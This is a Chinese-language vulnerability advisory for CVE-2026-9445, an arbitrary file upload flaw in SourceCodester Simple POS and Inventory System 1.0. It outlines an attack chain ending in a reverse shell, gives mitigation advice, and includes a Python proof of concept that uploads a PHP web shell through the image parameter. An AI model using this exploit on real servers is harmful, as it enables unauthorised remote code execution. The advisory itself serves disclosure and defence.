CVE-2026-9445 CVSS 6.3 中危

CVE-2026-9445 SourceCodester Simple POS任意文件上传漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9445

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Simple POS and Inventory System

漏洞概述

SourceCodester Simple POS and Inventory System 1.0存在文件上传漏洞。该漏洞位于/admin/addproduct.php文件中，由于文件扩展名处理组件缺乏有效的限制机制，攻击者可利用image参数上传任意文件。成功利用此漏洞可能导致远程代码执行，进而完全控制受影响的服务器。

技术细节

该漏洞源于SourceCodester Simple POS and Inventory System 1.0中/admin/addproduct.php文件的文件上传逻辑缺陷。系统在处理`image`参数时，未对上传文件的类型、扩展名及内容进行有效的安全校验。攻击者可以构造特定的HTTP POST请求，绕过前端限制，将含有恶意代码的PHP脚本伪装成合法文件上传到服务器。由于文件扩展名处理组件存在漏洞，服务器会将文件保留在可访问目录中。攻击者通过直接访问上传的文件，即可使服务器解析并执行恶意代码，从而获取服务器控制权。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行SourceCodester Simple POS系统，并定位到/admin/addproduct.php接口。

STEP 2

获取权限

根据CVSS PR:L要求，攻击者获取一个低权限账户凭证（如普通员工账号）。

STEP 3

漏洞利用

攻击者构造恶意HTTP请求，将包含Webshell的PHP文件通过image参数上传至服务器。

STEP 4

执行代码

攻击者通过浏览器访问上传的PHP文件路径，触发服务器解析并执行系统命令。

STEP 5

维持控制

利用执行的系统命令获取反向Shell，从而持久化控制受影响服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/admin/addproduct.php"

# Malicious PHP shell content
php_shell = "<?php system($_GET['cmd']); ?>"

# Prepare the payload with a PHP extension
files = {
    'image': ('exploit.php', php_shell, 'application/octet-stream')
}

# Additional form data if required
data = {
    'product_name': 'Hacked Product',
    'price': '0'
}

# Send the POST request
# Note: Valid session cookies or authentication tokens may be required based on PR:L
response = requests.post(url, files=files, data=data)

if response.status_code == 200:
    print("[+] Payload uploaded successfully!")
    print("[+] Check the uploaded file path to execute commands.")
else:
    print("[-] Upload failed.")

影响范围

SourceCodester Simple POS and Inventory System 1.0

防御指南

临时缓解措施

建议立即限制对/admin目录的访问权限，仅允许可信IP访问。同时，应在Web服务器配置（如Apache .htaccess或Nginx配置）中禁止在图片上传目录执行PHP脚本。管理员应审查系统日志，检查是否存在异常文件上传记录，并删除已上传的可疑文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9445
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9445
3 Details https://www.cvedetails.com/cve/CVE-2026-9445/
4 VulDB https://vuldb.com/cve/CVE-2026-9445
5 Link https://gist.github.com/c4ttr4ck/dd5c36ac4317232be183b7b90139d064
6 Link https://vuldb.com/submit/813612
7 Link https://vuldb.com/vuln/365426
8 Link https://vuldb.com/vuln/365426/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表